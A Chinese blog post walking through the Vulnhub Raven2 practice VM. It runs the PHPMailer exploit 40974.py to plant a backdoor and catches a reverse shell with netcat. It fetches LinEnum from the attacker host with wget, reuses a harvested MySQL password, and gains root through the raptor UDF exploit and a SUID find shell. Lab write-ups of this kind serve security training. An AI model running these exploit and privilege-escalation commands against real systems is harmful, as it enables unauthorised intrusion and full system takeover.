Vulnhub系列靶机---Raven2

2023-10-14 01:12
文章标签 系列 vulnhub 靶机 raven2

本文主要是介绍Vulnhub系列靶机---Raven2,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

文章目录

  • Raven2 渗透测试
    • 信息收集
    • 提权
          • UDF脚本
          • MySQL提权
          • SUID提权

Raven2 渗透测试

信息收集

查看存活主机

arp-scan -l 

image-20231013145244867

找到目标主机。

扫描目标主机上的端口、状态、服务类型、版本信息

nmap -A 192.168.160.47

image-20231013145457797

目标开放了 22、80、111 端口

访问一下80端口,并查看它的组件:

image-20231013150134020

没有发现什么有用的信息

对目标目录进行扫描

sudo dirsearch -u 192.168.160.47 -i 200

image-20231013155218961

也可以使用dirb http://192.168.160.47 进行目录扫描:

image-20231013163507385

/vendor/PATH 中找到了flag1

image-20231013160821360

拿到了flag1:

image-20231013160844261

/vendor/VERSION 中有一个版本号,这可能是一个软件版本号:

image-20231013161254195

再看 /vendor 目录下,还有几个文件名含有 phpmailer 的文件,如PHPMailerAutoload.php ,可确定 5.2.6 是 PHPMailer 的版本号。

于是使用漏洞利用搜索工具 searchsploit 在 exploit-db 中搜索 PHPMailer 相关的 exp。

image-20231013162158120

选用40974.py.使用cp命令将py文件复制到桌面,并且使用vim编辑器打开

cp /usr/share/exploitdb/exploits/php/webapps/40974.py /home/kali/Desktop
vim 40974.py

image-20231013163703386

image-20231013165915997

运行python代码

python 40974.py

image-20231013165038842

浏览器访问http://192.168.160.47/contact.php生成后门文件

在这里插入图片描述

用nc开启监听并访问http://192.168.160.47/sky.php 获得一个低级的shell

nc -lvnp 4444

image-20231013170123411

使用python获取pty得到交互式的shell

python -c 'import pty;pty.spawn("/bin/bash")'

image-20231013170539852

在根目录下全局搜索flag

find / -name *flag*

image-20231013171922982

看到了flag2和flag3.png

查看flag2:

image-20231013172059098

查看flag3:

image-20231013172207988

查看wordpress的配置文件 /var/www/html/wordpress/wp-config.php

image-20231013172401476

image-20231013172559067

得到数据库账号:root ,数据库密码:R@v3nSecurity

提权

在kali终端下载枚举漏洞工具LinEnum

sudo  proxychains git clone https://github.com/rebootuser/LinEnum.git 

里面有一个LinEnum.sh可执行文件

image-20231013174023923

用python搭建一个简单的服务器来把文件下载到靶机里面

python -m http.server 7788

image-20231013174214325

在靶机上使用wget下载

wget http://192.168.160.12:7788/LinEnum.sh

image-20231013174932732

查看到没有执行权限

image-20231013175104124

需要提权,chmod修改权限后,再./LinEnum.sh执行

chmod +x LinEnum.sh

image-20231013175318988

执行:

image-20231013175558026

查到了数据库的版本信息

image-20231013203219465

数据库版本为5.5.60

UDF脚本

利用脚本

  • https://www.exploit-db.com/exploits/1518

image-20231013191717106

searchsploit -m 1518
cp /usr/share/exploitdb/exploits/linux/local/1518.c ./1518.c
gcc -g -c 1518.c
gcc -g -shared -o 1518.so 1518.o -lc

将1518.so 文件上传到/tmp 目录下

image-20231013221611075

MySQL提权
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/1518.so'));
select * from foo into dumpfile 
create function do_system returns integer soname 
select * from mysql.func;
select do_system('chmod u+s /usr/bin/find');
www-data@Raven:/tmp$ mysql -uroot -pR@v3nSecurity
mysql -uroot -pR@v3nSecurity
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 37
Server version: 5.5.60-0+deb8u1 (Debian)Copyright (c) 2000, 2018, Oracle and/or its affiliates. All rights reserved.Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.mysql> use mysql;
use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -ADatabase changed
mysql> create table foo(line blob);
create table foo(line blob);
Query OK, 0 rows affected (0.01 sec)mysql> insert into foo values(load_file('/tmp/1518.so'));
insert into foo values(load_file('/tmp/raptor_udf.so'));
Query OK, 1 row affected (0.00 sec)mysql> select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf.so';
Query OK, 1 row affected (0.01 sec)mysql> create function do_system returns integer soname 'raptor_udf.so';
create function do_system returns integer soname 'raptor_udf.so';
Query OK, 0 rows affected (0.00 sec)mysql> select * from mysql.func;
select * from mysql.func;
+-----------+-----+---------------+----------+
| name      | ret | dl            | type     |
+-----------+-----+---------------+----------+
| do_system |   2 | raptor_udf.so | function |
+-----------+-----+---------------+----------+
1 row in set (0.00 sec)mysql> select do_system('chmod u+s /usr/bin/find');
select do_system('chmod u+s /usr/bin/find');
+--------------------------------------+
| do_system('chmod u+s /usr/bin/find') |
+--------------------------------------+
|                                    0 |
+--------------------------------------+
1 row in set (0.01 sec)

image-20231013220804186

此时,/usr/bin/find 就具备了SUID 权限

SUID提权
find 15* -exec '/bin/sh' \;

image-20231013220627431

image-20231013221721916

这篇关于Vulnhub系列靶机---Raven2的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/207115

相关文章

Spring Security 从入门到进阶系列教程

Spring Security 入门系列 《保护 Web 应用的安全》 《Spring-Security-入门(一):登录与退出》 《Spring-Security-入门(二):基于数据库验证》 《Spring-Security-入门(三):密码加密》 《Spring-Security-入门(四):自定义-Filter》 《Spring-Security-入门(五):在 Sprin

科研绘图系列:R语言扩展物种堆积图(Extended Stacked Barplot)

介绍 R语言的扩展物种堆积图是一种数据可视化工具,它不仅展示了物种的堆积结果,还整合了不同样本分组之间的差异性分析结果。这种图形表示方法能够直观地比较不同物种在各个分组中的显著性差异,为研究者提供了一种有效的数据解读方式。 加载R包 knitr::opts_chunk$set(warning = F, message = F)library(tidyverse)library(phyl

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

flume系列之:查看flume系统日志、查看统计flume日志类型、查看flume日志

遍历指定目录下多个文件查找指定内容 服务器系统日志会记录flume相关日志 cat /var/log/messages |grep -i oom 查找系统日志中关于flume的指定日志 import osdef search_string_in_files(directory, search_string):count = 0

GPT系列之:GPT-1,GPT-2,GPT-3详细解读

一、GPT1 论文:Improving Language Understanding by Generative Pre-Training 链接:https://cdn.openai.com/research-covers/languageunsupervised/language_understanding_paper.pdf 启发点:生成loss和微调loss同时作用,让下游任务来适应预训

Java基础回顾系列-第七天-高级编程之IO

Java基础回顾系列-第七天-高级编程之IO 文件操作字节流与字符流OutputStream字节输出流FileOutputStream InputStream字节输入流FileInputStream Writer字符输出流FileWriter Reader字符输入流字节流与字符流的区别转换流InputStreamReaderOutputStreamWriter 文件复制 字符编码内存操作流(

Java基础回顾系列-第五天-高级编程之API类库

Java基础回顾系列-第五天-高级编程之API类库 Java基础类库StringBufferStringBuilderStringCharSequence接口AutoCloseable接口RuntimeSystemCleaner对象克隆 数字操作类Math数学计算类Random随机数生成类BigInteger/BigDecimal大数字操作类 日期操作类DateSimpleDateForma

Java基础回顾系列-第三天-Lambda表达式

Java基础回顾系列-第三天-Lambda表达式 Lambda表达式方法引用引用静态方法引用实例化对象的方法引用特定类型的方法引用构造方法 内建函数式接口Function基础接口DoubleToIntFunction 类型转换接口Consumer消费型函数式接口Supplier供给型函数式接口Predicate断言型函数式接口 Stream API 该篇博文需重点了解:内建函数式

Java基础回顾系列-第二天-面向对象编程

面向对象编程 Java类核心开发结构面向对象封装继承多态 抽象类abstract接口interface抽象类与接口的区别深入分析类与对象内存分析 继承extends重写(Override)与重载(Overload)重写(Override)重载(Overload)重写与重载之间的区别总结 this关键字static关键字static变量static方法static代码块 代码块String类特

Java基础回顾系列-第六天-Java集合

Java基础回顾系列-第六天-Java集合 集合概述数组的弊端集合框架的优点Java集合关系图集合框架体系图java.util.Collection接口 List集合java.util.List接口java.util.ArrayListjava.util.LinkedListjava.util.Vector Set集合java.util.Set接口java.util.HashSetjava